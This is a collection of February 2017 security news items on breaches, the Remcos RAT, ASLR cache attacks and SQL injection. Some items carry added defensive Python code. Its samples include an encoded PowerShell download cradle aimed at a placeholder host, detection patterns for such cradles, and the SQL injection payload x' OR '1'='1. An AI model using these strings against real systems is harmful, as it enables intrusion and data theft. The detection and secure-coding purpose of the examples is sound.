Cyber Warriors See Politics Muddying Security Efforts

16.2.2017 securityweek Cyber

San Francisco - President Donald Trump has vowed to improve cyber attack defense, but security experts meeting this week say a fractious domestic and international political landscape could hamstring efforts to improve internet security.

As the White House mulls an executive order on cybersecurity to combat an epidemic of data breaches and hacks, participants at the annual RSA Conference voiced concern that dwindling political unity will challenge efforts to improve defense.

"The core of the problem hasn't changed; defenders have to win every time whereas attackers only have to win once," Forrester Research vice president and group director Laura Koetzle told AFP, while discussing the current state of online threats.

"What is different now is that the geopolitical situation is more unstable than it has been in quite a while."

Anti-globalization rhetoric that has been inflamed by Trump's rise and the United Kingdom's Brexit have shaken faith in the "globally interconnected world order" -- seen as upholding rules and agreements to peacefully resolve online and real-world differences between nations.

If alliances for thwarting online assaults weaken, Koetzle said, "greater testing from Russia, North Korea, China" and others can be expected, as countries test how far limits can be pushed.

The issue of cyber defense was brought to the forefront after US intelligence officials concluded Russia had carried out a series of attacks aimed at disrupting the election, possibly helping Trump's campaign.

And an unprecedented series of breaches that have compromised data on millions of US government employees, internet giants such as Yahoo and large companies like Sony Pictures present additional challenges to the administration.

'Digital Geneva Convention'

Microsoft chief legal officer Brad Smith used the RSA stage to call for a "Digital Geneva Convention" that would set lines that should not be crossed in cyber war, with an independent oversight body to identify offenders.

"Just as the Fourth Geneva Convention has long protected civilians in times of war, we now need a Digital Geneva Convention that will commit governments to protecting civilians from nation-state attacks in times of peace," Smith said during a keynote presentation.

While addressing RSA attendees, Representative Michael McCaul, a Texas Republican who heads the House Committee on Homeland Security, was among those warning of looming cyber threats.

"There is no doubt in my mind that the Russian government tried to undermine our elections," McCaul said.

"Cyber intrusion has the potential to change the very fabric of our democracy."

Sameer Bhalotra, co-chair of a task force formed to advise Trump at the Center for Strategic and International Studies, said the country needs an agency that investigates cyber attacks.

He said the administration's stance on reducing regulation could speed the adoption of national computer security standards, because there would be less worry about being tethered by rules.

Technology and trust

Cyber policy task force co-chair Karen Evans had advised the administration to consider data as belonging to the user -- an approach that could bolster arguments against weakening encryption or building in back doors to access people's data.

The task force also strongly advocated bulking up cyber defenses and raising the cost of attacks to discouraging levels, while urging the government to rely on the private sector.

Trump had been expected to release an executive order focused on cyber security early this week, but it was unclear Wednesday when it might land.

Recommendations from the task force included a few radical ideas, such as befriending hackers and promoting "bug bounties" to reward those who discover system vulnerabilities, said Nico Sell, co-founder of encrypted messaging service Wickr.

"If the administration expects an improvement in how we deal with cyber incidents, they will have to figure out how to foster trust -- especially in this charged environment," Koetzle said. "The poisoning of politics fosters a tendency of not collaborating with institutions, and that is when things break down; especially in cyber security."


Yahoo Notifies Users of Sophisticated Breach Methods

16.2.2017 securityweek Safety
Yahoo said Wednesday it was notifying some users that hackers may have been able to use a maneuver to break into their accounts without stealing passwords.

The latest notifications were in response to the record breach disclosed late last year affecting an estimated one billion users -- which involved the forging of "cookies", the files used to authenticate users when they log into their accounts.

The notification indicates the investigation into the attacks is in its final stage, according to a source familiar with the matter, who noted that messages had been sent to "a reasonably final list" of Yahoo users.

A Yahoo spokesman said the company was notifying all potentially affected users and that it had "invalidated" the forged cookies.

"As we have previously disclosed, our outside forensic experts have been investigating the creation of forged cookies that could have enabled an intruder to access our users' accounts without a password," the company said in a statement.

"The investigation has identified user accounts for which we believe forged cookies were taken or used."
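The forged-cookie problem described above comes down to how a server decides that a session cookie is genuine and how it can later refuse cookies it has already issued. The Python below is an added illustration, not Yahoo's code or a description of its systems: it signs the cookie payload with an HMAC under a versioned signing key, verifies it with a constant-time comparison, and shows two ways to "invalidate" cookies, bumping a per-user session epoch (for accounts whose cookies are suspected forged) and retiring a signing key (for a suspected key compromise). All key values, user names and helper names are constructed for the example.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Dict, Optional

# Constructed signing keys for the example; real keys live in a secret store.
ACTIVE_KEYS: Dict[str, bytes] = {"k1": b"constructed-key-one", "k2": b"constructed-key-two"}
RETIRED_KEYS = set()  # key ids whose cookies are no longer accepted


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_cookie(user_id: str, epoch: int, key_id: str, ttl: int = 3600,
                 now: Optional[float] = None) -> str:
    """Return 'key_id.payload.mac'; the HMAC covers both the key id and the payload."""
    now = time.time() if now is None else now
    payload = json.dumps({"uid": user_id, "epoch": epoch, "exp": int(now) + ttl},
                         separators=(",", ":")).encode()
    signed = key_id.encode() + b"." + b64url_encode(payload).encode()
    mac = hmac.new(ACTIVE_KEYS[key_id], signed, hashlib.sha256).digest()
    return signed.decode() + "." + b64url_encode(mac)


def verify_cookie(cookie: str, user_epochs: Dict[str, int],
                  now: Optional[float] = None) -> Optional[str]:
    """Return the user id for a genuine, unexpired, not-invalidated cookie, else None."""
    now = time.time() if now is None else now
    try:
        key_id, payload_b64, mac_b64 = cookie.split(".")
        if key_id in RETIRED_KEYS or key_id not in ACTIVE_KEYS:
            return None
        signed = (key_id + "." + payload_b64).encode()
        expected = hmac.new(ACTIVE_KEYS[key_id], signed, hashlib.sha256).digest()
        # Constant-time comparison: without the key a forger cannot produce this MAC,
        # and timing must not reveal how many bytes of a guess were right.
        if not hmac.compare_digest(expected, b64url_decode(mac_b64)):
            return None
        data = json.loads(b64url_decode(payload_b64))
        if data["exp"] < now:
            return None
        # Per-user epoch: bumping it rejects every cookie issued before the bump.
        if data["epoch"] != user_epochs.get(data["uid"], 0):
            return None
        return data["uid"]
    except (ValueError, KeyError, TypeError):
        return None  # malformed cookie, bad Base64 or unexpected payload shape


def invalidate_user_sessions(user_epochs: Dict[str, int], user_id: str) -> None:
    """Force re-login for one account, e.g. when its cookies are suspected forged."""
    user_epochs[user_id] = user_epochs.get(user_id, 0) + 1


def retire_key(key_id: str) -> None:
    """Stop accepting every cookie signed under key_id, e.g. after a key compromise."""
    RETIRED_KEYS.add(key_id)
```

The two invalidation paths serve different situations: the epoch handles a bounded set of accounts without touching anyone else's sessions, while retiring a key is the blunt tool for the case where the signing material itself is no longer trusted and every cookie it ever produced has to be treated as forgeable.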

Yahoo announced in September that hackers in 2014 stole personal data from more than 500 million of its user accounts. It admitted another cyber attack in December, this one dating from 2013, affecting more than a billion users.

The data breaches have been a major embarrassment for a former internet leader that is in the process of selling its core operations to telecom giant Verizon for $4.8 billion.

Some reports Wednesday said the two companies had agreed to discount the price by $250 million to $300 million following disclosure of the attacks.

Neither Yahoo nor Verizon commented on the reports.

Yahoo is selling its main operating business as a way to separate that from its more valuable stake in Chinese internet giant Alibaba.

The share-tending entity, to be renamed Altaba, Inc., will act as an investment company.


Defense Practically Does Not Exist. The Viruses Erase All Traces Themselves

15.2.2017 Novinky/Bezpečnost Viry
Last year saw a veritable flood of ransomware viruses. They could wreak havoc on the infected machine, but at least the user knew immediately where they stood, because the uninvited guests demanded a ransom almost right away. This year's new wave of attacks is far more serious, however, because the malicious code plays hide-and-seek with users.
Ransomware attacks almost always follow the same script. The uninvited guest encrypts the data stored on the hard drive. The attackers try to give the owner of the infected machine the impression that they will regain access to their files after paying a fine, supposedly levied for using illegal software or the like.

Even after paying the ransom, users may not get their data back. Instead of paying, the virus must be uninstalled from the computer and the data decrypted, which may not be easy at all, and in some cases is not possible at all.

In any case, the user notices the activity of a computer virus practically as soon as it settles into the computer. If they have a backup of their data, reinstalling the operating system is enough and they are no longer at risk.

They try to stay hidden
Security experts at the antivirus company Kaspersky Lab have now warned, however, that so-called invisible targeted attacks are on the rise. As the name suggests, the attackers try to stay hidden for as long as possible.

"Invisible attacks use only legitimate software, such as widely available penetration-testing and administration tools or the PowerShell framework for automating tasks in Windows. They leave no malware files on the hard drive; instead they hide them in main memory," the security experts noted.

This makes detecting the malicious code on an infected machine much harder. Normally, traces of hacker activity can be found on hard drives even a year after the attack. When the data is hidden in memory, it is automatically erased the first time the computer restarts.

"Attackers stay in the system only as long as strictly necessary, gathering information before their traces are wiped from the system by the first restart," the experts added.

They mainly attack companies
Cybercriminals use this tactic mainly in attacks on companies. It cannot be ruled out, however, that they will apply the same approach to attacks on end users in the foreseeable future.

Kaspersky Lab has so far uncovered similar attacks on more than forty companies in Europe, the United States, South America and other parts of the world. The attackers focus mainly on banks, telecommunications companies and, not least, government organizations. Whether a similar attack has taken place in the Czech Republic is not clear at this time.
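The memory-only, PowerShell-driven activity the Kaspersky Lab experts describe leaves little on disk, so detection has to come from telemetry captured while the code runs rather than from files found afterwards. The Python below is an added example, not Kaspersky Lab's tooling: it scores constructed records modelled on PowerShell script block logging (Windows Event ID 4104; the record layout and every sample value are this example's own), decodes Base64 encoded commands before matching, and flags records whose weighted indicator score reaches a threshold. The indicator set, weights and threshold are assumptions to be tuned to a real environment.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed records modelled on PowerShell script block logging (Event ID 4104).
# The field layout and the contents are this example's own, not a real log export.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')".encode("utf-16le")
).decode()
SAMPLE_EVENTS: List[Dict] = [
    {"event_id": 4104, "host": "ws01", "script": "Get-ChildItem C:\\Logs | Sort-Object Length"},
    {"event_id": 4104, "host": "ws02", "script": "powershell -nop -w hidden -enc " + _ENCODED},
    {"event_id": 4104, "host": "ws03", "script": "[System.Reflection.Assembly]::Load($bytes) | Out-Null"},
    {"event_id": 4688, "host": "ws04", "script": "notepad.exe"},  # not a script block event
]

# Indicators of in-memory execution, with assumed weights; tune per environment.
INDICATORS = {
    "encoded_command": (2, re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    "hidden_window": (1, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    "no_profile": (1, re.compile(r"-(?:nop|noprofile)\b", re.I)),
    "invoke_expression": (1, re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)),
    "download_cradle": (2, re.compile(r"DownloadString|DownloadData|WebClient|Invoke-WebRequest", re.I)),
    "reflective_load": (3, re.compile(r"Reflection\.Assembly\]::Load|VirtualAlloc", re.I)),
}
ALERT_THRESHOLD = 3  # assumption

_ENC_RX = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


def expand_encoded_command(script: str) -> str:
    """Append the decoded -EncodedCommand payload (Base64 of UTF-16LE) so indicators inside it are visible."""
    m = _ENC_RX.search(script)
    if not m:
        return script
    try:
        return script + "\n" + base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return script  # malformed payload: match on the raw text only


def score_event(event: Dict) -> Optional[Dict]:
    """Score one record; non-script-block events are ignored."""
    if event.get("event_id") != 4104:
        return None
    text = expand_encoded_command(event["script"])
    hits = [name for name, (_, rx) in INDICATORS.items() if rx.search(text)]
    score = sum(INDICATORS[name][0] for name in hits)
    return {"host": event["host"], "score": score, "indicators": hits}


def scan_events(events: List[Dict]) -> List[Dict]:
    """Return the script block events whose score reaches the threshold, highest first."""
    findings = [s for s in (score_event(e) for e in events) if s and s["score"] >= ALERT_THRESHOLD]
    return sorted(findings, key=lambda f: f["score"], reverse=True)


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f['host']}: score {f['score']} ({', '.join(f['indicators'])})")
```

The decoding step matters more than the pattern list: an encoded command looks like noise to a plain string match, so a scanner that does not unwrap it sees only the launcher flags and misses what was actually run. In a real deployment this logic sits on top of script block logging that has to be enabled and forwarded before the restart that erases the in-memory evidence.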


Easy-to-Use Remcos RAT Spotted in Live Attacks

15.2.2017 Securityweek Virus

After receiving numerous improvements, a Remote Administration Tool (RAT) that emerged last year on hacking forums was recently observed in live attacks, Fortinet security researchers reveal.

Dubbed Remcos, the RAT was put up for sale during the second half of 2016 and is currently available starting at $58 and going up to $389, depending on the selected license period and number of "masters" or clients. Available as version 1.7.3 at the moment, the malware is distributed via malicious Office documents named Quotation.xls or Quotation.doc, supposedly delivered via email.

The malicious documents include obfuscated macros designed to call shell commands to bypass User Account Control (UAC) and execute the malware with elevated privileges, researchers say. Abusing Event Viewer (eventvwr.exe) for privilege escalation, the UAC-bypass technique has been adopted by various threats recently, including ransomware.

Remcos itself offers only the UPX and MPRESS1 packers to compress and obfuscate its server component, but the analyzed sample used an extra custom packer on top of MPRESS1, with no other obfuscation beyond this. The server component was built from the latest Remcos v1.7.3 Pro variant, which was released on Jan. 23, 2017, the developer’s website shows.

The code also revealed the commands that the server can carry out, all of which are also included in the free, stripped down client version available through the developer’s website. The Remcos Client features five main tabs, each with specific functions, namely Connections, Automatic Tasks, Local Settings, Builder, and Event Log.

Through the Connections tab, one can monitor all active connections and can view basic information on the installed server component and the infected system for each of them, Fortinet explains. What’s more, this tab allows the sending of commands to the infected system, allowing an actor to take screenshots of the targeted machine, search for files, view running processes, execute commands, log keystrokes, steal passwords, access the webcam and microphone, download and execute code, and more.

While most of the commands are common to RATs, the Automatic Tasks tab in Remcos is a feature new to applications in this category. Through it, the server component can be configured to automatically execute functions without any manual action from the client once a connection has been established. Through this feature, an actor can easily create an infiltrate-exfiltrate-exit scheme that doesn’t require manual triggers, something usually seen in spyware or malware downloaders, the security researchers say.

The Local Settings tab provides access to settings for the client side, allowing an attacker to set which ports on the client machine the server should connect to, as well as the passwords that should be used. The same password is required on both the listening port and the connecting server, because Remcos uses the password for both authentication and as a key for encrypting network traffic using a simple RC4 algorithm.

The Builder tab allows wannabe criminals to customize the parameters of the server binary. This tab features a series of sub-sections, including Connection (to set client IP addresses and ports for the server to connect to upon installation), Installation (to set installation path, autorun registries, and a watchdog module, along with a UAC bypass), Stealth (set system tray icon behavior and basic anti-analysis/anti-sandbox routines), Keylogger (set basic keylogger functions and an option to remove browser cookies and stored passwords), Surveillance (set the option to take screenshots periodically or when specific windows are active), and Build (to pack the server binary using UPX and MPRESS).

“It is possible that the attacker only used the document macro as a template to download and execute the binary, and never intended to use the script’s UAC bypass since the server binary itself already has the same function. In fact, it uses the same UAC bypass technique, but this time with an added routine to revert the modified registry after gaining privilege. This is logical, because not restoring the registry can produce system errors that can cause suspicion from the user every time an .msc file needs to be opened,” the researchers say.

The Event Log tab was meant to display connection logs with the server, as well as information regarding the client’s status (updates, ports, etc.). There is also an About tab, which contains acknowledgements and some promotions on other products by an author named Viotto.

Fortinet also points out that this RAT once again shows that one doesn’t have to be an expert to launch fairly sophisticated malware attacks: “More and more applications like Remcos are being released publicly, luring new perpetrators with their easy usage. And all it takes to be infected by one are a few clicks.”

Remcos’ author supposedly attempts to discourage malicious usage of the tool by means of license bans, but only if such misuse is reported. According to Fortinet, such claims are often “nothing but a false shield” that RAT authors use to protect themselves from liability when the application is exposed as a full-blown malware builder.


Study Shows Exposure of Critical Sectors, ICS in U.S.

15.2.2017 Securityweek ICS

A study conducted by Trend Micro using the Shodan search engine provides some useful information on the exposure of critical infrastructure and industrial systems in the United States.

The study, based on a Shodan search performed in February 2016, targeted cyber assets in critical infrastructure and other sectors (e.g. government, emergency, healthcare, utilities, financial services and education), and industrial control systems (ICS), such as the ones used for building automation, manufacturing processes, power generation and traffic system management.

Researchers determined that in the government sector a majority of the exposed cyber assets were firewalls (48%), wireless access points (13%), specialized devices (9%), routers (6%) and other security devices (6%). Several unpatched servers have been found in these organizations, including ones running Apache Tomcat, Microsoft IIS and Apache HTTPD.

The study showed that the number of cyber assets exposed in Washington, DC is smaller than in Lafayette, Indiana, and Saint Paul, Minnesota.

Lafayette and Houston, Texas, have the highest number of exposed cyber assets associated with emergency services, although only a few hundred were discovered in each of these cities.

Firewalls, printers and routers account for a majority of the exposed devices in the emergency services sector. Trend Micro pointed out that vulnerable servers have not been identified in these organizations.

While the healthcare industry has been increasingly targeted by cybercriminals, the Shodan search showed a relatively small number of exposed assets in this sector, mainly firewalls and other security devices. On the other hand, some vulnerable servers were exposed by these organizations. The highest number of exposed assets were identified in Cambridge and New York City.

When it comes to the utilities sector, Trend Micro has determined that the exposed cyber assets are primarily located in small cities and towns. The largest number of devices, which are mainly wireless access points and firewalls, were discovered in Clarksville, Hopkinsville, Braintree, Ocala and Bismarck.

In the financial sector, New York City has the highest number of exposed assets (nearly 15,000), which is not surprising considering that the city is a global financial center. Firewalls and other security devices account for more than 90 percent of the exposed devices in this sector.

The education sector is by far the most exposed, with tens of thousands of assets in Philadelphia, Seattle, Chicago, Los Angeles, Ann Arbor and Austin.

Exposed ICS devices

Trend Micro’s study also focused on exposed industrial systems. The top four most exposed ICS-specific protocols identified by researchers are MODBUS, BACnet, Ethernet/IP and Tridium’s proprietary Fox protocol.

In the case of MODBUS, a popular application layer protocol used for interacting with programmable logic controllers (PLCs), experts identified tens of instances in Fort Lauderdale, Houston, New York and Princeton. Many of these products were BMX processor modules from Schneider Electric.

Instances of BACnet, which is used for building automation and control, were identified in Houston, Chicago and Miami. A majority of the products come from Tridium and Trane.

PLCs made by Rockwell Automation’s Allen-Bradley accounted for a majority of the systems exposing Ethernet/IP.

During its research, the security firm also identified exposed human-machine interfaces (HMI). These systems had not been compromised, but being accessible from the Internet put them at risk. The exposed HMIs were associated with a milling machine, a roller press, a water treatment plant, a conveyor belt, an air-handling system, and a power converter.

Exposed HMI

Trend Micro has also conducted a separate study focusing on all popular Internet-connected devices in the U.S., including webcams, routers, NAS devices, phones, media players, and web and email servers. The largest number of exposed cyber assets were found in Los Angeles, Houston, Chicago, Dallas, Phoenix, San Jose and New York.


Researchers Break ASLR Protection via JavaScript Attack

15.2.2017 Securityweek Attack
Address space layout randomization (ASLR) protection can be broken via practical attacks using JavaScript without any specific instructions or software features, a newly published research paper claims.

According to a group of researchers from Vrije Universiteit Amsterdam in the Netherlands, ASLR is fundamentally insecure on modern cache-based architectures, although it is used as the main line of defense against memory corruption attacks. Although existing attacks against ASLR rely on software vulnerabilities or on repeated memory probing, simpler attacks are possible, the researchers claim.

In their paper (PDF), the researchers detail a new EVICT+TIME cache attack on the virtual address translation that the memory management unit (MMU) of modern processors performs. The attack, they explain, “relies on the property that the MMU’s page-table walks result in caching page-table pages in the shared last-level cache (LLC).”

Dubbed ASLR⊕Cache, or AnC, the attack allows an actor to derandomize virtual addresses of a victim’s code and data. Because the attack relies only on basic memory accesses, it can be implemented in JavaScript, and researchers demonstrate how such an implementation can break code and heap ASLR in two major browsers (Chrome and Firefox) on Linux systems.

The attack, the researchers explain, relies on the interplay between the MMU and the caches during virtual to physical address translation, a behavior critical to efficient code execution on modern CPUs. The issue, they say, is that on modern architectures an attacker who knows how to craft memory accesses can observe timing differences that reveal which memory was accessed and infer the bits that make up the address. These timing differences are considered fundamental, reflecting the way caches optimize accesses in the memory hierarchy, the researchers explain.

The AnC attack, the paper says, is applicable to a wide range of modern architectures, including Intel, ARM and AMD, while mitigation without naively disabling caches is hard, because it targets the low-level operations of the MMU. The researchers say that the AnC attack was possible on all of the tested architectures and that all, except for ARMv7, allowed them to fully derandomize ASLR.

The researchers also explain that an ongoing AnC attack can be detected using performance counters, although this type of defense is prone to false positives. Partitioning the shared LLC is another option, though with a performance impact, while reducing timer accuracy so that attackers cannot distinguish cache hits from accesses served from memory is often costly to implement. AnC can also be mitigated by caching page-table entries in a separate cache rather than in the data caches.

“The conclusion is that such caching behavior and strong address space randomization are mutually exclusive. Because of the importance of the caching hierarchy for the overall system performance, all fixes are likely to be too costly to be practical. Moreover, even if mitigations are possible in hardware, such as separate cache for page tables, the problems may well resurface in software. We hence recommend ASLR to no longer be trusted as a first line of defense against memory error attacks and for future defenses not to rely on it as a pivotal building block,” the paper concludes.


FireEye Becomes AV Replacement, Adds macOS Support

15.2.2017 Securityweek Apple
SAN FRANCISCO – RSA CONFERENCE 2017 - Cyber threat protection and intelligence firm FireEye today unveiled major updates to its endpoint security platform, including two new protection engines and support for Apple’s macOS systems.

The new capabilities are the first of several no-cost upgrades for FireEye Endpoint Security customers that are coming in 2017, the company says.

As part of the latest FireEye Endpoint Security platform, a new “Exploit Guard” engine leverages behavioral analysis capabilities to detect known threats, while a new partnership integrates Bitdefender’s anti-malware engine to protect against more traditional commodity malware. The combination allows FireEye Endpoint Security to serve as an Anti-Virus replacement with a single agent that can satisfy compliance requirements.

The company claims that the behavioral analysis engine powering the new Exploit Guard feature has, in testing environments, been able to detect and block nearly all the previously unknown exploits – without signatures or indicators – that were publicly reported over the past three years.

“We took every zero-day exploit that affected Windows machines from 2014, 2015 and 2016 and fed them into this engine,” FireEye CTO Grady Summers told SecurityWeek at the company’s recent internal Momentum 2017 conference. Summers, who previously served as CISO at GE, explained that FireEye pulled down all the ransomware and exploit kits they could find on Virus Total and were able to achieve a 99.74% efficacy (detection) rate with no signatures or prior knowledge.

The company boasts an advantage of continually responding to high profile breaches around the world via its Mandiant team, where incident responders and analysts are able to see where other products fail. The company says that in Q4 2016, Mandiant responded to more security breaches than in any prior quarter in the company’s history.

"Well over 80 percent of the time, if I'm reading a headline, we are there," Kevin Mandia, CEO at FireEye, told SecurityWeek in a meeting at the Momentum Conference last month. "That makes me feel good."

“At FireEye, our security innovation begins at the breach. Because we own that moment, we get to witness firsthand how attackers evade other security safeguards – including 'next gen' endpoint – and this allows us to innovate at the speed of attackers,” Kara Wilson, Chief Marketing Officer at FireEye, wrote in a blog post.
In addition to insights gained from the Mandiant Incident Response team, context from FireEye iSIGHT Intelligence helps security teams prioritize and triage threats, the company says.

“FireEye Endpoint Security is built to speed up and simplify endpoint protection and response with high-fidelity alerts, context from FireEye iSIGHT Intelligence, and forensic and investigation capabilities scaled to hundreds of thousands of endpoints,” the company explains. “This seamless integration of prevention, detection and response capabilities in a single agent also greatly simplifies the customer deployment and lowers the performance impact on the endpoint.”

These new capabilities are generally available to customers globally immediately.

The integration of Bitdefender's anti-virus engine is expected to occur during the first quarter of 2017, with additional roll-out of other detection and prevention capabilities following later this year.

In addition to the recently added support for macOS endpoints, support for Linux servers will be added later in 2017. Other enhancements coming this year will include virtual and cloud form factors and expanded behavioral analysis and machine learning capabilities to protect against unknown malware and exploits.

After seeing its stock price decline significantly over the past years, along with major executive leadership changes, FireEye is betting on new products and partnerships to help improve its position in the cybersecurity solutions market.

In late 2016, FireEye launched new cloud-based network security and threat intelligence offerings. The company also announced a deal with Microsoft that allows Windows Defender Advanced Threat Protection (WDATP) users to gain access to FireEye's iSIGHT adversary based intelligence.

In November 2016 the company unveiled FireEye Helix, a new platform designed to help customers efficiently integrate and automate security operations functions and accelerate incident response.

In December 2016, FireEye and the NATO Communications and Information Agency (NCI) announced an information sharing partnership, under which the two organizations will exchange non-classified technical information related to cyber threats and vulnerabilities.

“The investments we are making in 2017 for our customers in Endpoint Security are significant, as it is a core component of the FireEye Helix platform and a huge opportunity for our business,” Mandia said in a statement.


Cyber Skills Shortage May Require Employers to Change Course: Report

15.2.2017 Securityweek Cyber
The cyber security skills gap is known and documented, and empirically understood by all enterprise security leaders. It was recently quantified by job site Indeed.com, which measured the difference between available positions and market interest in them. A new report from ISACA titled Current Trends in Workforce Development (PDF) now seeks to understand the shortcomings in the available applicants, and what can be done by enterprises to minimize the effect of skills shortage.

The report is the first released part of ISACA's State of Cyber Security 2017 survey. 633 ISACA members responded to an online questionnaire, representing more than 20 industries and all five major geographical regions. North America and Eurasia provided 85% of the respondents in almost equal measure. Technology services at 28%, and finance/banking at 23% provided more than half of the total industry sectors.

The effect of the skills shortage is severe, with more than 25% of enterprises taking more than 6 months to fill a security vacancy. Only 59 percent of the organizations say they receive at least five applications for each cyber security opening, and only 13 percent receive 20 or more. This compares to the 60 to 250 applications for the majority of non-security job openings.

The survey finds that the "main problem of obtaining key talent in the realm of cyber security stems from a lack of qualified applicants." This is a serious issue that goes beyond the trivial chicken and egg explanation. Cyber security is such a rapidly evolving area that new skills are required almost as soon as schools and colleges begin to train for old requirements.

Threat hunting analysts are a prime example. All security technologies generate huge logs. Those logs contain, somewhere, the subtle indications of system compromise. But it requires a human analyst with a particular set of skills to be able to hunt through a myriad of log alerts to be able to detect the few genuine issues from a mass of false positives.

This is a relatively new development in cyber security. It stems from the rapidly growing use of AI and machine-learning algorithms designed to detect anomalies. They work on the basis of a probability score rather than a binary malicious/not malicious decision. A human analyst is required to make the final decision on the probable; and third-party threat-hunting training is in short supply.

Even when trained threat hunters enter the marketplace, they will do so without practical experience. However, more than half (55%) of the respondents report that practical, hands-on experience is the most important cyber security qualification. Employers are simply demanding the impossible: anybody already possessing both qualifications and experience has got that experience by being in employment. It becomes a question of poaching rather than recruiting, with the inevitable result that skills move upwards towards the bigger and better financed enterprises, magnifying the problem for small and medium companies without doing anything to solve the basic problem.

Even within the low number of applicants, 25% of respondents say today's cyber security candidates are lacking in technical skills; while 45% do not believe most applicants understand the business of cyber security.

ISACA offers several recommendations to help employers find, assess and retain qualified cyber security talent. In locating talent, it suggests looking internally, and/or looking in a different direction externally. Internally, it suggests that employers should "Groom employees with tangential skills -- such as application specialists and network specialists -- to move into cyber security positions." This solves the technical skills problem (these employees will already possess them) while experience can be gained 'on the job'.

Externally it recommends a path already taken by many organizations: engage with and cultivate students and career changers. "An outreach program to a university or an internship program can help with this," it says.

ISACA also recommends automation wherever possible. "Where security operational tasks can be automated, it can decrease the overall burden on staff and thereby help make best use of the staff that an organization already has."

The ISACA report will be discussed at the RSA Conference, on Thursday, February 16th. A CISO panel including four ISACA leaders will discuss "State of Cybersecurity: Overcome Workforce Challenges, Build a Skilled Team."


Russian Black Hat Hacks 60 Universities, Government Agencies

15.2.2017 Securityweek Cyber
A Russian-speaking black hat hacker has breached the systems of more than 60 universities and U.S. government agencies, according to threat intelligence firm Recorded Future.

The hacker, tracked by the company as “Rasputin,” typically exploits SQL injection vulnerabilities to gain access to sensitive information that he can sell on cybercrime marketplaces.

Rasputin is the hacker who last year breached the systems of the U.S. Election Assistance Commission (EAC) and attempted to sell more than 100 access credentials, including ones providing administrator privileges. Researchers found evidence that he had been negotiating with a potential buyer representing a Middle Eastern government.

Recorded Future has been monitoring the hacker’s activities and identified many of his victims, including over two dozen universities in the United States, ten universities in the United Kingdom, and many U.S. government agencies.

The list of targeted government agencies includes local, state and federal organizations. The targeted federal agencies are the Postal Regulatory Commission, the Department of Housing and Urban Development, the Health Resources and Services Administration, and the National Oceanic and Atmospheric Administration.

US organizations targeted by Rasputin

There are plenty of free tools that can be used to find and exploit SQL injection vulnerabilities, including Havij, Ashiyane SQL Scanner, SQL Exploiter Pro, SQLI Hunter, SQL Inject Me, SQLmap and SQLSentinel. However, Rasputin has been using a SQL injection tool that he developed himself.

“Financial profits motivate actors like Rasputin, who have technical skills to create their own tools to outperform the competition in both identifying and exploiting vulnerable databases,” said Levi Gundert, VP of intelligence and strategy at Recorded Future.

Experts believe Rasputin picks his targets based on their perceived investment in security controls and the potential value of the stolen data. The personal information stored in the targeted organizations’ databases can be highly valuable, particularly if the data is associated with users in North America and Western Europe.

Recorded Future pointed out that while SQL injection vulnerabilities have been around for a long time and can be easily prevented through basic secure coding practices, addressing these types of flaws can often be costly.

“The problem and solution are well understood, but solutions may require expensive projects to improve or replace vulnerable systems. These projects are often postponed until time and/or budget is available, until it’s too late to prevent SQLi victimization,” said Gundert.
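The "basic secure coding practice" Recorded Future refers to is parameterized queries. The added example below (not from the article or from Recorded Future) shows the defective string-built query beside the parameterized one against a constructed in-memory SQLite table, so the difference is visible in the row counts each returns.

```python
"""Constructed example: the classic string-concatenation SQL injection
beside the parameterized query that closes it. Uses an in-memory SQLite
database; every row and input below is made up for the demonstration."""
import sqlite3

# Constructed sample data of the kind a university portal might expose
# through a "look up a person" search form.
SAMPLE_ROWS = [
    ("alice", "alice@example.edu", "staff"),
    ("bob", "bob@example.edu", "student"),
    ("carol", "carol@example.edu", "admin"),
]


def make_db() -> sqlite3.Connection:
    """Create an in-memory database populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """The defective pattern: user input is pasted into the SQL text.

    Whatever the caller types becomes part of the statement, so a single
    quote character lets them rewrite the WHERE clause.
    """
    query = "SELECT username, email, role FROM users WHERE username = '%s'" % username
    return conn.execute(query).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, username: str) -> list:
    """The hardened pattern: the driver binds the value as data, never as SQL."""
    query = "SELECT username, email, role FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


def demo() -> dict:
    """Run both lookups with a benign name and with a quote-bearing input.

    Returns the row counts so the difference is checkable programmatically:
    the vulnerable query dumps the whole table, while the parameterized one
    treats the very same string as a (non-existent) username.
    """
    conn = make_db()
    benign = "bob"
    # Constructed hostile input: closes the string literal and appends a
    # tautology, so the concatenated WHERE clause matches every row.
    hostile = "x' OR '1'='1"
    return {
        "vulnerable_benign": len(lookup_vulnerable(conn, benign)),
        "vulnerable_hostile": len(lookup_vulnerable(conn, hostile)),
        "parameterized_benign": len(lookup_parameterized(conn, benign)),
        "parameterized_hostile": len(lookup_parameterized(conn, hostile)),
    }


if __name__ == "__main__":
    for name, count in demo().items():
        print(f"{name:22s} -> {count} row(s)")
```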


CrowdStrike Sues NSS Labs to Prevent Publication of Test Results

15.2.2017 securityweek Security

CrowdStrike filed suit against NSS Labs

On February 10, 2017, next-gen endpoint protection firm CrowdStrike filed suit against security product testing firm NSS Labs, and sought a temporary restraining order to prevent publication of CrowdStrike comparative test results. On February 13, the injunction was denied by the District Court of Delaware. On February 14, NSS published the results as part of its Advanced Endpoint Protection Group Test Results.

